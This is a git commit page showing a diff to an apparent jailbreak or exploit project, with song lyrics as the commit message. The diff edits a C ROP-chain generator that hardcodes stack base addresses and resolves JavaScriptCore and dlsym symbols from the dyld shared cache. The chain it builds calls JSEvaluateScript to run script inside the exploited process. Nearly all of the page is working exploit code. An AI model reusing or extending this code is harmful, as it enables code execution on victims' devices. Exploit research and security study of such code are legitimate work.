diff options
| author | spv420 <unomilliono@gmail.com> | 2022-05-31 19:51:14 -0400 |
|---|---|---|
| committer | spv420 <unomilliono@gmail.com> | 2022-05-31 19:51:14 -0400 |
| commit | b040db45dfc9ef9a902e48bc2718a94cd099f505 (patch) | |
| tree | 7b361fbd03f866b225473a54f837ec388f9fa4fb /src/gen | |
| parent | fe765137cd79a671dc3e6932bb867ef333611e73 (diff) | |
I live in a constant state of fear and misery
Do you miss me anymore?
And I don't even notice
When it hurts anymore
Anymore
Anymore
Anymore
Diffstat (limited to 'src/gen')
| -rw-r--r-- | src/gen/main.c | 4 | ||||
| -rw-r--r-- | src/gen/stage2.c | 15 |
2 files changed, 12 insertions, 7 deletions
diff --git a/src/gen/main.c b/src/gen/main.c index 30726d5..5ee0286 100644 --- a/src/gen/main.c +++ b/src/gen/main.c @@ -206,8 +206,8 @@ int main(int argc, fprintf(stderr, "0x%x\n", RTLD_DEFAULT); - uint32_t stack_base = 0x1c7718; // my shell setup -// uint32_t stack_base = 0x1c772c; // my shell setup +// uint32_t stack_base = 0x1c7718; // my shell setup + uint32_t stack_base = 0x1c7708; // my shell setup // uint32_t stack_base = 0x1c7c88; // my 4s shell setup // uint32_t stack_base = 0x1c2e48; // my lldb // uint32_t stack_base = 0x1c7d68; // btserver env diff --git a/src/gen/stage2.c b/src/gen/stage2.c index 8b98a7e..7e611c8 100644 --- a/src/gen/stage2.c +++ b/src/gen/stage2.c @@ -313,12 +313,17 @@ rop_chain_shit gen_rop_chain(uint32_t base, uint32_t JSGlobalContextCreateInGroup = get_dyld_shc_sym_addr_jsc("JSGlobalContextCreateInGroup"); uint32_t JSContextGetGlobalObject = get_dyld_shc_sym_addr_jsc("JSContextGetGlobalObject"); uint32_t JSStringCreateWithUTF8CString = get_dyld_shc_sym_addr_jsc("JSStringCreateWithUTF8CString"); + uint32_t JSObjectGetProperty = get_dyld_shc_sym_addr_jsc("JSObjectGetProperty"); uint32_t JSEvaluateScript = get_dyld_shc_sym_addr_jsc("JSEvaluateScript"); uint32_t dlsym_ = get_dyld_shc_sym_addr("dlsym"); MOV_R0(dlsym_); STR_R0(base + reserve_addr + 24); + fprintf(stderr, "var JSStringCreateWithUTF8CString = 0x%08x;\n" + "var JSObjectGetProperty = 0x%08x;\n" + "var JSContextGetGlobalObject = 0x%08x;\n", JSStringCreateWithUTF8CString, JSObjectGetProperty, JSContextGetGlobalObject); + // uint32_t settimeofday = get_dyld_shc_sym_addr("settimeofday"); fprintf(stderr, "0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x\n", JSContextGroupCreate, JSGlobalContextCreateInGroup, JSContextGetGlobalObject, JSStringCreateWithUTF8CString, JSEvaluateScript, dlsym_); @@ -356,11 +361,11 @@ rop_chain_shit gen_rop_chain(uint32_t base, MOV_R0(0x108000); CALL_SLID(JSStringCreateWithUTF8CString); - STR_R0(base + reserve_addr + 0x48); + STR_R0(base + reserve_addr + 0x4a); PRINT_STILL_HERE(); - DEREF_IN_R0(base + reserve_addr + 0x48); + DEREF_IN_R0(base + reserve_addr + 0x4a); MOV_R1_R0(); - CALL_SLID_4_PTRARG_L2_0(JSEvaluateScript, base + reserve_addr + 0x44, base + reserve_addr + 0x48); + CALL_SLID_4_PTRARG_L2_0(JSEvaluateScript, base + reserve_addr + 0x44, base + reserve_addr + 0x4a); MOV_R1_R0(); PRINT_STILL_HERE(); @@ -378,13 +383,13 @@ rop_chain_shit gen_rop_chain(uint32_t base, MOV_R0(0x10a000); CALL_SLID(JSStringCreateWithUTF8CString); - STR_R0(base + reserve_addr + 0x48); + STR_R0(base + reserve_addr + 0x4a); PRINT_STILL_HERE(); /* DEREF_IN_R0(base + reserve_addr + 0x48); MOV_R1_R0(); */ - CALL_SLID_4_PTRARG_L2_0(JSEvaluateScript, base + reserve_addr + 0x44, base + reserve_addr + 0x48); + CALL_SLID_4_PTRARG_L2_0(JSEvaluateScript, base + reserve_addr + 0x44, base + reserve_addr + 0x4a); MOV_R1_R0(); PRINT_STILL_HERE(); |